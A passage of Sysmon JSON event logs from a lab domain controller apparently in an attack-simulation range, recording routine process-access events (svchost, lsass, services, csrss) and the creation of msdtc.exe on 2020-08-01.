C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.236\r\nProcessGuid: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nProcessId: 2368\r\nImage: C:\\Windows\\System32\\msdtc.exe\r\nFileVersion: 2001.12.10941.16384 (rs1_release.160715-1616)\r\nDescription: Microsoft Distributed Transaction Coordinator Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: MSDTC.EXE\r\nCommandLine: C:\\Windows\\System32\\msdtc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\NETWORK SERVICE\r\nLogonGuid: {41C8662E-1F63-5F25-0000-0020E4030000}\r\nLogonId: 0x3E4\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.236","ProcessGuid":"{41C8662E-1FED-5F25-0000-0010BD060500}","Image":"C:\\Windows\\System32\\msdtc.exe","FileVersion":"2001.12.10941.16384 (rs1_release.160715-1616)","Description":"Microsoft Distributed Transaction Coordinator Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"MSDTC.EXE","CommandLine":"C:\\Windows\\System32\\msdtc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\NETWORK SERVICE","LogonGuid":"{41C8662E-1F63-5F25-0000-0020E4030000}","LogonId":"0x3e4","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
